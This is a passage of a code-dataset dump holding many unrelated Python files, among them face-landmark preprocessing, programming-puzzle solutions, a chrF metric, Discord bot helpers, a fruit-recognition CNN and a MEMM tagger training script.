return points\n\n\ndef points_in_box(points, facebox, threshold=0.5):\n total_points = len(points)\n in_box_points = 0\n for point in points:\n x = point[0]\n y = point[1]\n\n if facebox[0] < x < facebox[0]+facebox[2] and facebox[1] < y < facebox[1] + facebox[3]:\n in_box_points += 1\n\n in_box_rate = float(in_box_points) / float(total_points)\n if in_box_rate > threshold:\n return True\n else:\n return False\n\n\n# input box should have the format of [x, y, w, h]\ndef rectify_box(box, pic_shape):\n (x, y, w, h) = box\n (pic_h, pic_w, _) = pic_shape\n length = max(w, h)\n mid_x = x + w / 2\n mid_y = y + h / 2\n w = length\n h = length\n\n x = max(0, mid_x-length/2)\n y = max(0, mid_y-length/2)\n x = min(x, pic_w-length)\n y = min(y, pic_h-length)\n\n return [x, y, w, h]\n\n\ndef box_in_range(box, pic_shape):\n (x, y, w, h) = box\n (pic_h, pic_w, _) = pic_shape\n x = max(0, x)\n y = max(0, y)\n w = min(w, pic_w-x)\n h = min(h, pic_h-y)\n\n box = [x, y, w, h]\n return box\n\n\ndef draw_landmark_point(image, points):\n \"\"\"\n Draw landmark point on image.\n \"\"\"\n for point in points:\n cv2.circle(image, (int(point[0]), int(\n point[1])), 3, (0, 255, 0), -1, 2)\n\n\ndef draw_box(image, box):\n x, y, w, h = box\n cv2.rectangle(image, (int(x), int(y)), (int(x+w), int(y+h)), (255, 255, 255), 2)\n\n\ndef get_facebox(pic_file, plot=False):\n pic_path = os.path.join(data_path, pic_file)\n name, _ = get_extension(pic_file)\n points = read_points(name + '.pts')\n img = cv2.imread(pic_path)\n # img = cv2.resize(img, standard_size)\n rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n detector = MTCNN()\n faces = detector.detect_faces(rgb_img)\n result = None\n for face in faces:\n box = face['box']\n # box = box_in_range(box, img.shape)\n # box = rectify_box(box, img.shape)\n\n if points_in_box(points, box):\n box = box_in_range(box, img.shape)\n box = rectify_box(box, img.shape)\n result = box\n\n if result == None:\n return None\n\n if result[1] != 0:\n result[1] += int(0.1 * result[3])\n\n if plot:\n draw_landmark_point(img, points)\n draw_box(img, result)\n cv2.imshow('img', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return result\n\n\ndef crop_and_scale(file_name, facebox, points):\n x, y, w, h = facebox\n # img = cv2.imread(os.path.join(data_path, file_name))\n # face = img[int(y):int(y+h), int(x):int(x+w)]\n # face = cv2.resize(face, standard_size)\n # cv2.imwrite(os.path.join(data_path, 'cropped', file_name), face)\n name, _ = get_extension(file_name)\n pts_path = os.path.join(data_path, 'cropped', name + '.pts')\n pts_file = open(pts_path, 'w+')\n for p in points:\n p[0] -= x\n p[1] -= y\n scaling_factor = w/standard_size[0]\n p = p/scaling_factor\n pts_file.write(p)\n pts_file.write('\\n')\n\n pts_file.close()\n\n\n\ndef scale_points(points, facebox):\n x, y, w, h = facebox\n for p in points:\n p[0] -= x\n p[1] -= y\n\n\ndef main():\n for _,_,files in os.walk(data_path):\n for f in files:\n name, ext = get_extension(f)\n if ext == 'pts':\n continue\n facebox = get_facebox(f, plot=False)\n points = read_points(name + '.pts')\n if facebox == None or not points_in_box(points, facebox):\n os.remove(os.path.join(data_path, f))\n os.remove(os.path.join(data_path, name+'.pts'))\n else:\n crop_and_scale(f, facebox, points)\n print(f)\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"600887323","text":"from GuardShiftSched import GuardSched\nfh = open('Day4Puzzle.txt')\nfileContents = []\n\nfor x in fh:\n fileContents.append(x)\n\nfh.close()\n\nsortedContents = sorted(fileContents)\n\nguardSched = GuardSched()\n\nfor x in sortedContents:\n guardSched.addRecToList(x)\n\nguardSched.createSchedule()\nguardSched.findSleepingMostSpecMin()","sub_path":"Python/Advent Of Code/2018/Day 4/Day4Ex2.py","file_name":"Day4Ex2.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"291361270","text":"import nltk\n\ntry:\n nltk.data.find('tokenizers/punkt')\nexcept LookupError:\n nltk.download('punkt')\n\ndef chrf(trans_file, pred_file):\n refs = []\n with open(trans_file, encoding=\"utf8\") as test:\n for line in test:\n line = line.strip().lower().split()\n refs.append(line)\n\n preds = []\n with open(pred_file, encoding=\"utf8\") as pred:\n for line in pred:\n line = line.strip().lower().split()\n preds.append(line)\n\n score = nltk.translate.chrf_score.corpus_chrf(refs, preds)\n return score","sub_path":"evaluation/metrics/chrf.py","file_name":"chrf.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"485638695","text":"'''\nAuthor: Puffrora\nDate: 2021-11-26 23:50:44\nLastModifiedBy: Puffrora\nLastEditTime: 2021-11-27 00:11:27\n'''\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def goodNodes(self, root: TreeNode) -> int:\n\n res = 0\n\n def dfs(node, cur_max):\n nonlocal res\n if not node:\n return\n if node.val >= cur_max:\n res += 1\n\n dfs(node.left, max(cur_max, node.val))\n dfs(node.right, max(cur_max, node.val))\n\n dfs(root, root.val)\n\n return res\n","sub_path":"Leetcode/leetcode1448 统计二叉树中好节点的数目.py","file_name":"leetcode1448 统计二叉树中好节点的数目.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"369290028","text":"\"\"\"\nLab_Python_06\nPart 1\n\"\"\"\n\nimport datetime\n\n\"\"\"\nWhatever the datastructure you choose,\nit should represent the following data:\n\nplayer\t\t| date\t\t| score\n_______________________________________\nrooney\t\t| 6/23/2012\t| 2\nrooney\t\t| 6/25/2012\t| 2\nronaldo\t\t| 6/19/2012\t| 0\nronaldo\t\t| 6/20/2012\t| 3\ntorres\t\t| 6/21/2012\t| 0\ntorres\t\t| 6/21/2012\t| 1\n\"\"\"\nimport time\nfrom datetime import date\n## create the player_stats data structure\n\nplayer_stats = {\n 'rooney' :[(date(2012,6,23),2),\n (date(2012,6,25),2)],\n 'ronaldo':[(date(2012,6,19),0),\n (date(2012,6,20),3)],\n 'torres' :[(date(2012,6,21),0),\n (date(2012,6,21),1)]\n }\n\n\n## implement highest_score\ndef highest_score(player_stats):\n highest_score = 0\n highest_scorer = []\n for i in player_stats:\n for j in player_stats[i]:\n if (j[1] > highest_score):\n highest_score = j[1]\n highest_scorer = (i,j[0],j[1])\n return highest_scorer\n\n## implement highest_score_for_player\ndef highest_score_for_player(player_stats,player):\n highest_score_for_player = 0\n\n for i in player_stats[player]:\n if (i[1] > highest_score_for_player):\n highest_score_for_player = i[1]\n return highest_score_for_player\n\n## implement highest_scorer\ndef highest_scorer(player_stats):\n highest_scorer = \"\"\n score = 0\n list1={}\n for i in player_stats:\n sum1 = 0\n for j in range(len(player_stats[i])):\n sum1 = sum1 + player_stats[i][j][1]\n list1[i]=sum1\n for i in list1:\n if (list1[i] >= score):\n highest_scorer = i\n return highest_scorer\n\n\"\"\"\nDictionary with Tuples:\nThe name of the player serves as a Key which has\na list of tuples of when the players played and\nthe goals scored\n\nthis way we can refrence the date the goals were\nscored by the players\n\"\"\"\n","sub_path":"Lab06_part1.py","file_name":"Lab06_part1.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"236896313","text":"x, y = map(int, input().split())\n\nif (x+y)%3 != 0:\n print(0)\n exit()\n\nm = (2*x - y)//3\nn = (2*y - x)//3\n\nif m<0 or n<0:\n print(0)\n exit()\n\n\"\"\"Combination(mod付き)の高速計算\"\"\"\ndef extgcd(a, b):\n if b == 0:\n return a, 1, 0\n else:\n d, x, y = extgcd(b, a % b)\n x -= (a // b) * y\n return d, y, x\n \ndef modinv(a, mod): \n return extgcd(a, mod)[1] % mod\n\ndef modcomb(n, k, mod):\n q, a = 1, 1\n for i in range(n-k+1, n+1):\n q = (q * i) % mod\n for i in range(2, k+1):\n a = (a * i) % mod\n return int(q * modinv(a, mod) % mod)\n\nans = modcomb(n+m, m, 10**9+7)\nprint(ans)","sub_path":"atcoder/2019/ABC/1116_abc145/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"572536674","text":"'''\nThings this file should do\n 1. sort the list of cluster ids\n 2. initialize a 'q_clust' array\n 3. fill array by testing if cluster has multiple particles\n'''\nimport numpy as np\n\n# Read in the clust ID array\ndef binaryCluster( ids, clust_num, size_min=1000 ):\n \n part_num = len(ids)\n sort = np.sort(ids)\n biclust = np.zeros((clust_num), dtype=np.bool_)\n index = 0\n for a in range(0, clust_num):\n add_clust = 0\n while 1:\n add_clust += 1\n if index == part_num: # break if index is too large\n break\n if sort[index] != a: # break if ID changes\n break\n if add_clust == 1: # all particles appear once\n biclust[a] = 0\n if add_clust > size_min: # only multiple ids appear twice\n biclust[a] = 1\n index += 1 # increment index\n\n return biclust\n","sub_path":"wdd_pkg/qclust.py","file_name":"qclust.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"316062735","text":"from bac.bin import sc\n\ndef test_delete_args():\n s = sc.Sc()\n assert s._delete_arg_buffer(service_name='DeleteThisService') == ['delete', '\"DeleteThisService\"']\n\ndef test_create_args():\n s = sc.Sc()\n arg_buffer = s._create_arg_buffer(service_name='DeleteThisService', bin_path=r'c:\\windows\\system32\\notepad.exe')\n assert arg_buffer == ['create', 'DeleteThisService', 'binPath=', r'\"c:\\windows\\system32\\notepad.exe\"']\n \n arg_buffer = s._create_arg_buffer(service_name='svnserve', \n bin_path=r'\\\"C:\\Program Files\\CollabNet Subversion Server\\svnserve.exe\\\" --service -r \\\"C:\\my repositories\\\"',\n display_name=\"Subversion Server\",\n depend='Tcpip',\n start='auto')\n print(\" \".join(arg_buffer))\n assert \" \".join(arg_buffer) == r'create svnserve binPath= \"\\\"C:\\Program Files\\CollabNet Subversion Server\\svnserve.exe\\\" --service -r \\\"C:\\my repositories\\\"\" start= auto depend= Tcpip DisplayName= \"Subversion Server\"'","sub_path":"tests/unit/test_bin_sc.py","file_name":"test_bin_sc.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"452714957","text":"import discord, aiohttp, asyncio, functools, json, io\nfrom discord.ext import commands\nfrom logging import Formatter\nfrom textwrap import TextWrapper\nfrom xml.etree import ElementTree\nfrom . import __version__\n\nclass NvFormatter(Formatter):\n\tLINE_WIDTH = 100\n\twrapper = TextWrapper(width = LINE_WIDTH)\n\t\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\n\tdef format(self, record):\n\t\tmessage = record.getMessage()\n\t\t\n\t\tif \"\\n\" not in message[:self.LINE_WIDTH + 80]:\n\t\t\tlines = self.wrapper.wrap(message)\n\t\telse:\n\t\t\tlines = message.splitlines()\n\t\t\t\n\t\tmessage = f\"\\n{' ' * 7} | {' ' * 15} | \".join(lines)\n\t\treturn f\"{record.levelname:7} | {record.name:15} | {message}\"\n\t\nclass BadMessageResponse(Exception):\n\tpass\n\t\t\nclass CommandCancelled(commands.CommandError):\n\t@classmethod\n\tasync def create(self, message, ctx):\n\t\tawait ctx.send(f\":x: | {message}.\")\n\t\treturn CommandCancelled(message)\n\t\t\nclass CustomCommandError(commands.CommandError):\n\tdef __init__(self, title, desc, *args, **kwargs):\n\t\tself.title = title\n\t\tself.desc = desc\n\t\t\nUSER_AGENT = f\"{aiohttp.http.SERVER_SOFTWARE} Heraldtron/{__version__} (like Herald 3.0)\" #for fun\n\t\nasync def get_bytes(session, url, **kwargs):\n\tasync with session.get(url) as source:\n\t\timage = await source.read(**kwargs)\n\t\treturn io.BytesIO(image)\n\t\nasync def get_json(session, url, **kwargs):\n\tasync with session.get(url) as source:\n\t\treturn await source.json(**kwargs)\n\t\t\t\nasync def get_text(session, url, **kwargs):\n\tasync with session.get(url) as source:\n\t\treturn await source.text(**kwargs)\t\n\t\t\nasync def get_channel(bot, channel):\n\treturn bot.get_channel(channel) or await bot.fetch_channel(channel)\n\t\nasync def get_guild(bot, guild):\n\treturn bot.get_guild(guild) or await bot.fetch_guild(guild)\n\t\nasync def get_user(bot, user):\n\treturn bot.get_user(user) or await bot.fetch_user(user)\n\t\nasync def unqualify_name(bot, name, discriminator):\n\treturn discord.utils.find(\n\t\tlambda m: m.name == name and m.discriminator == discriminator, bot.users\n\t)\n\t\nasync def check_is_owner(ctx):\n\tif not await ctx.bot.is_owner(ctx.author):\n\t\traise commands.NotOwner(\"Owner-only mode is enabled\")\n\t\treturn False\n\treturn True\n\t\nasync def check_limited(ctx):\n\tif not ctx.guild: return True\n\t\n\tif ctx.bot.guild_cache[ctx.guild.id][1][2]: \n\t\traise CustomCommandError(\n\t\t\t\"Command prohibited\",\n\t\t\t\"This command is not allowed on this server.\"\n\t\t)\n\t\treturn False\n\t\n\treturn True\n\t\ndef parse_xml(text_string, root):\n\treturn ElementTree.fromstring(text_string).find(root)\n\n@functools.cache\t\ndef pronounise(word):\n\tpron = \"an\" if word.strip()[0].upper() in \"AEIOU1\" else \"a\"\n\treturn f\"{pron} {word}\"\n\t\n@functools.cache\ndef stdtime(value):\n\treturn f\"{value.day} {value:%B} {value.year}\"\n\nasync def _typing(self, ctx): \n\tawait ctx.trigger_typing()\n\t\ntrigger_typing = commands.before_invoke(_typing)","sub_path":"ht/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"419830838","text":"# import MySQLdb\n\ndef getFollowingInformation(client, user_id, followingCount):\n\n followingsList = list()\n user_url = '/users/' + str(user_id) + '/followings'\n \n for i in range(0, followingCount, 50):\n followings = client.get(user_url, offset=i)\n followingsList.append(followings)\n \n return followingsList\n \ndef insertDB(user_id, followingsList):\n\n database = MySQLdb.connect(host=\"127.0.0.1\", user = \"root\", passwd=\"\", db = \"soundcloud\")\n database.set_character_set('utf8') \n cursor = database.cursor()\n \n for followings in followingsList:\n \n for following in followings:\n \n query = \"INSERT INTO T_FOLLOWINFO (FOLLOWUSER) VALUES (%s)\"\n FOLLOWUSER = following.id\n values = (FOLLOWUSER)\n cursor.execute(query, (values,))\n \n query = \"INSERT INTO T_ACTIVITY (USERID, ACTIVITYTYPE, FOLLOWID) VALUES (%s, %s, %s)\"\n \n USERID = user_id\n ACTIVITYTYPE = \"10\"\n FOLLOWID = cursor.lastrowid\n \n values = (USERID, ACTIVITYTYPE, FOLLOWID)\n cursor.execute(query, values)\n \n cursor.close()\n database.commit()\n database.close()\n \nfrom py2neo import Graph\n \ndef add2Neo4J(user_id, followingsList):\n \n graph = Graph()\n\n for followings in followingsList:\n for following in followings.collection:\n tx = graph.cypher.begin()\n tx.append(\"MATCH (u1:User),(u2:User) WHERE u1.id = {A} AND u2.id = {B} CREATE UNIQUE (u1)-[:FOLLOWS]->(u2)\", \n {\"A\":user_id, \"B\":following.id})\n tx.process()\n tx.commit()\n ","sub_path":"following_information.py","file_name":"following_information.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"471837861","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 28 09:31:30 2019\r\n\r\n@author:vinayak sable \r\n\"\"\"\r\n\r\nimport numpy as np # dealing with arrays\r\nimport os # dealing with directories\r\nfrom random import shuffle # mixing up or currently ordered data that might lead our network astray in training.\r\nimport glob\r\nimport cv2\r\n\r\npath = r'Path of folder contain fruits images fordels'\r\nIMG_SIZE = 400\r\nLR = 1e-3\r\n\r\nMODEL_NAME = 'Fruits_dectector-{}-{}.model'.format(LR, '5conv-basic')\r\nno_of_fruits=7\r\npercentage=0.3\r\nno_of_images=100\r\n\r\ndef create_train_data(path):\r\n training_data = []\r\n folders=os.listdir(path)[0:no_of_fruits]\r\n for i in range(len(folders)):\r\n label = [0 for i in range(no_of_fruits)]\r\n label[i] = 1\r\n print(folders[i])\r\n k=0\r\n for j in glob.glob(path+\"\\\\\"+folders[i]+\"\\\\*.jpg\"): \r\n if(k==no_of_images):\r\n break\r\n k=k+1\r\n img = cv2.imread(j)\r\n img = cv2.resize(img, (IMG_SIZE,IMG_SIZE))\r\n training_data.append([np.array(img),np.array(label)])\r\n np.save('training_{}_{}_{}.npz'.format(no_of_fruits,no_of_images,IMG_SIZE),training_data)\r\n shuffle(training_data)\r\n return training_data,folders\r\n\r\n\r\nimport tflearn\r\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\r\nfrom tflearn.layers.core import input_data, dropout, fully_connected\r\nfrom tflearn.layers.estimator import regression\r\n\r\n\r\n#model building\r\nimport tensorflow as tf\r\ntf.reset_default_graph()\r\nconvnet = input_data(shape=[None, IMG_SIZE, IMG_SIZE, 3], name='input')\r\n\r\nconvnet = conv_2d(convnet, 32, 5, activation='relu')\r\n\r\nconvnet = max_pool_2d(convnet, 5)\r\n\r\nconvnet = conv_2d(convnet, 64, 5, activation='relu')\r\n\r\nconvnet = max_pool_2d(convnet, 5)\r\n\r\nconvnet = conv_2d(convnet, 128, 5, activation='relu')\r\nconvnet = max_pool_2d(convnet, 5)\r\n\r\nconvnet = conv_2d(convnet, 64, 5, activation='relu')\r\nconvnet = max_pool_2d(convnet, 5)\r\n\r\n\r\nconvnet = conv_2d(convnet, 32, 5, activation='relu')\r\nconvnet = max_pool_2d(convnet, 5)\r\n\r\nconvnet = fully_connected(convnet, 1024, activation='relu')\r\nconvnet = dropout(convnet, 0.8)\r\n\r\nconvnet = fully_connected(convnet, no_of_fruits, activation='softmax')\r\nconvnet = regression(convnet, optimizer='adam', learning_rate=LR, loss='categorical_crossentropy', name='targets')\r\n\r\nmodel = tflearn.DNN(convnet, tensorboard_dir='log')\r\n \r\n\r\n#data loading\r\ntraining_data,labels=create_train_data(path)\r\ntraining_data=np.load('training_{}_{}_{}.npz'.format(no_of_fruits,no_of_images,IMG_SIZE))\r\na=int(len(training_data)*percentage)\r\ntrain = training_data[:-a]\r\ntest=training_data[-a:]\r\n\r\nX = np.array([i[0] for i in train]).reshape(-1,IMG_SIZE,IMG_SIZE,3)\r\nY = [i[1] for i in train]\r\n\r\ntest_x = np.array([i[0] for i in test]).reshape(-1,IMG_SIZE,IMG_SIZE,3)\r\ntest_y = [i[1] for i in test]\r\n\r\nmodel.fit({'input': X}, {'targets': Y}, n_epoch=10, validation_set=({'input': test_x}, {'targets': test_y}), \r\n snapshot_step=500, show_metric=True, run_id=MODEL_NAME)\r\n\r\nmodel.save(MODEL_NAME)\r\n\r\n\r\n\r\nfrom calorie import calories\r\ntest_data='Image path for testing'\r\nimg=cv2.imread(test_data)\r\nimg1=cv2.resize(img,(IMG_SIZE,IMG_SIZE))\r\nmodel_out=model.predict([img1])\r\nresult=np.argmax(model_out)\r\nname=labels[result]\r\ncal=round(calories(result+1,img),2)\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.imshow(img)\r\nplt.title('{}({}kcal)'.format(name,cal))\r\nplt.axis('off')\r\nplt.show()\r\n\r\n\r\n\r\n","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"71728767","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pedido', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MultaCarregamento',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('vl_multa', models.DecimalField(null=b'true', verbose_name=b'Valor da multa (R$)', max_digits=17, decimal_places=2, blank=b'true')),\n ('carregamento', models.ForeignKey(related_name='carregamento_multa', blank=b'true', to='pedido.Carregamento', null=b'true')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='MultaItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('vl_multa', models.DecimalField(null=b'true', verbose_name=b'Valor da multa (R$)', max_digits=17, decimal_places=2, blank=b'true')),\n ('item', models.ForeignKey(related_name='item_multa', blank=b'true', to='pedido.Item', null=b'true')),\n ],\n options={\n 'abstract': False,\n },\n ),\n ]\n","sub_path":"multa/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"651744376","text":"from MEMM2 import MEMM\nimport pickle\nimport time\n\n# %%\ntrain_file = 'train2_expanded.wtag'\npredict_file = 'train1.wtag'\nmemm = MEMM(lamda=1,threshold=1)\n\n\n# weights_path = 'train1_weights.pkl'\n# with open(weights_path, 'rb') as f:\n# optimal_params = pickle.load(f)\n# pre_trained_weights = optimal_params\n# memm.assign_weights(pre_trained_weights)\n\nstart = time.time()\nmemm.fit(train_file)\nend = time.time()\nprint('time=', (end - start) / 60)\n\n\nweights_path = 'train2_final.pkl'\nwith open(weights_path, 'wb') as f:\n pickle.dump(memm.v, f)\n\n# start = time.time()\n# memm.predict(predict_file,hide_tags=True,beam_width=2)\n# end = time.time()\n# print('time=', (end - start) / 60)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"489448816","text":"import re\nimport numpy as np\nfrom decimal import Decimal, ROUND_HALF_UP\nimport string\nimport os\n\nfrom pint import UnitRegistry, Quantity, Unit, errors\n\nureg = UnitRegistry()\nureg.load_definitions(os.path.expanduser('~/pyimports/udef.txt'))\n\nkg = ureg.kg\ngm = ureg.g\nN = ureg.N\ns = ureg.s\nJ = ureg.J\nm = ureg.m\nmeters = ureg.m\nrad = ureg.rad\n\ndef Q_(quantity, unit=None):\n if unit is not None:\n return ureg.Quantity(quantity).to(unit)\n return ureg.Quantity(quantity)\n\ndef Qs(quantities, unit=None):\n res = []\n\n for quantity in quantities.split(' '):\n if unit is not None:\n res.append(Q_(quantity).to(unit))\n else:\n res.append(Q_(quantity))\n\n return res\n\ndef proper_round(x, n=0):\n try:\n exp = str(1/10**n if n != 0 else 1)\n\n return Decimal(str(x)).quantize(Decimal(exp), rounding=ROUND_HALF_UP)\n except Exception:\n return round(x, n)\n\ndef to_sig(x, n=3, display=False):\n if x == 0:\n return '0'\n\n signed_x = x\n x = abs(x)\n\n int_length = len(str(int(x))) if str(int(x)) != '0' else 0\n round_length = len(str(int(proper_round(x))))\n\n if 0 < int_length <= n and round_length <= n:\n res = str(float(proper_round(x, n - int_length)))\n\n if len(res.replace('.', '')) < n:\n res = res.ljust(n + 1, '0')\n elif len(res.replace('.', '')) > n:\n res = str(int(float(res)))\n else:\n res = re.sub(r'0(\\d)$', r'\\1', ('{:.' + str(n - 1) + 'e}').format(x))\n res = res.replace('+', '')\n res = re.sub('e0$', '', res)\n\n res = res if signed_x >= 0 else f'-{res}'\n\n if display:\n sci_notation_components = res.split('e')\n\n if len(sci_notation_components) > 1:\n coefficient, exponent = sci_notation_components\n\n subs = [\n '- ⁻',\n '0 ⁰',\n '1 ¹',\n '2 ²',\n '3 ³',\n '4 ⁴',\n '5 ⁵',\n '6 ⁶',\n '7 ⁷',\n '8 ⁸',\n '9 ⁹',\n ]\n\n for sub in subs:\n x, y = sub.split(' ')\n\n exponent = exponent.replace(x, y)\n\n return '{} × 10{}'.format(coefficient, exponent)\n\n return res\n\ndef format_answer(answer, compare=False, no_rounding=False, suggest_unit=None, display=False):\n unit = suggest_unit\n n_figures = 3\n\n if isinstance(answer, tuple):\n try:\n n_figures = next(x for x in answer if isinstance(x, int) and not isinstance(x, bool))\n except StopIteration:\n pass\n\n try:\n unit = next(x for x in answer if isinstance(x, (Unit, str)))\n except StopIteration:\n pass\n\n try:\n is_abs = next(x for x in answer if isinstance(x, bool))\n except StopIteration:\n is_abs = False\n\n answer, *_ = answer\n answer = abs(answer) if is_abs else answer\n\n if isinstance(answer, Quantity):\n if unit is not None:\n try:\n answer.ito(unit)\n except errors.DimensionalityError:\n answer.ito_base_units()\n else:\n answer.ito_base_units()\n\n res = []\n if no_rounding:\n res.append(answer.magnitude)\n else:\n res.append(to_sig(answer.magnitude, n_figures, display))\n\n if compare:\n res.append(answer.magnitude)\n\n unit_display = '{:~P}'.format(answer.units)\n\n if display:\n res[0] += ' ' + unit_display\n else:\n res.append(unit_display)\n\n return res\n\n if isinstance(answer, (float, int, np.int64, np.float64)):\n res = []\n\n if no_rounding:\n res.append(answer)\n else:\n res.append(to_sig(answer, n_figures, display))\n\n if compare:\n res.append(answer)\n\n return res\n\n return str(answer),\n\ndef format_answers(*answers, compare=False, no_rounding=False, suggest_unit=None, display=False):\n if len(answers) == 0:\n return\n\n if isinstance(answers[0], list):\n answers = answers[0]\n\n res = []\n\n display_letter = True\n\n for i, answer in enumerate(answers):\n formatted_answer = []\n\n if answer is None:\n display_letter = False\n\n continue\n elif display_letter:\n formatted_answer.append(string.ascii_lowercase[i])\n else:\n formatted_answer.append('')\n\n formatted_answer += format_answer(answer, compare, no_rounding, suggest_unit, display)\n\n res.append(formatted_answer)\n\n return res\n\ndef print_answer(*args, **kwargs):\n if not 'display' in kwargs:\n kwargs['display'] = True\n\n print(format_answer(*args, **kwargs)[0])\n\ndef mag(*values):\n if isinstance(values[0], (list, tuple)):\n values = values[0]\n\n if len(values) > 1:\n return [v.magnitude for v in values]\n else:\n return values[0].magnitude\n\ng = 9.80 *m/s**2\nG = 6.674e-11 *N*m**2/kg**2\n\nπ = np.pi\n","sub_path":"files/pyimports/physics.py","file_name":"physics.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"487544325","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom sklearn.externals import joblib\n\n#from sentiment_vader import Vader\nfrom text_sentiment import TextSentiment\nfrom comment_sentiment import CommentSentiment, TopicSentiment\n\nABS_PATH = os.path.dirname(os.path.abspath(__file__))\nMODEL_FPATH = os.path.join(ABS_PATH, 'comment_sentiment.model')\nMODEL_FPATH_B = os.path.join(ABS_PATH, 'article_sentiment.model')\n\ndef load_CS_classifier(force=False):\n if not os.path.exists(MODEL_FPATH):\n if force:\n train_CS_classifier()\n else:\n raise OSError('The classifier persistence file does not exist, please train first.')\n return joblib.load(MODEL_FPATH)\n\ndef train_CS_classifier(load_extra=False):\n clf = CommentSentiment()\n clf.load_train_data()\n if load_extra:\n clf.load_extra_data()\n clf.train(clf.train_data.data, clf.train_data.target)\n joblib.dump(clf, MODEL_FPATH)\n\ndef load_TS_classifier(force=False):\n if not os.path.exists(MODEL_FPATH_B):\n if force:\n train_TS_classifier()\n else:\n raise OSError('The classifier persistence file does not exist, please train first.')\n return joblib.load(MODEL_FPATH_B)\n\ndef train_TS_classifier(load_extra=False):\n clf = TopicSentiment()\n clf.load_train_data()\n if load_extra:\n clf.load_extra_data()\n clf.train(clf.train_data.data, clf.train_data.target)\n joblib.dump(clf, MODEL_FPATH_B)\n","sub_path":"my_nlp/sentiment/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"626662195","text":"# -*- coding:utf-8 -*-\n\nimport map_reduce\n\ndef map_function(data):\n\tfor d in data:\n\t\tf = d.rstrip(\"\\r\\n\").split(\"\\t\")\n\t\tif f[1] == \"3\":\n\t\t\tmap_reduce.map_output(f[0], 1)\n\t","sub_path":"8_map_reduce_stat_buy/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349022109","text":"'''\nAuthor: \nDate: \nClass: ISTA 130\nSection Leader: \n\nDescription:\n\n'''\n\n# put all of your import statements below this line and then delete this comment\nimport sys\n# put all of your function definitions below this line and then delete this comment\n\ndef poem():\n user = input(\"What is your name?\\n\")\n print()\n print(\"Roses are red\")\n print(\"Some emeralds are green\")\n print(\"But I'm pretty sure that\")\n print(user, \"is the one for me\")\n#==========================================================\ndef main():\n '''\n Write a description of what happens when you run\n this file here.\n '''\n # put main code here, make sure each line is indented one level, and delete this comment\n poem()\n input('Press enter to end.') # keeps the turtle graphics window open\n\nif __name__ == '__main__':\n main()\n","sub_path":"lab/lab3/poem.py","file_name":"poem.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"103479190","text":"from __future__ import print_function\nfrom distributed.exp_server import ExperienceServer\nimport cv2, random, threading, msgpack, os\nfrom nnet.Online import Online\nfrom nnet.Metric_Visualizer import Metric_Visualizer\nfrom nnet.Trainer import Trainer\nfrom functools import partial\nimport msgpack_numpy as m\nimport numpy as np\nfrom steps import session\n\n__author__ = 'dhruv karthik '\n\ndef deserialize_obs():\n def _deser(multipart_msg):\n lidar = msgpack.loads(multipart_msg[0], 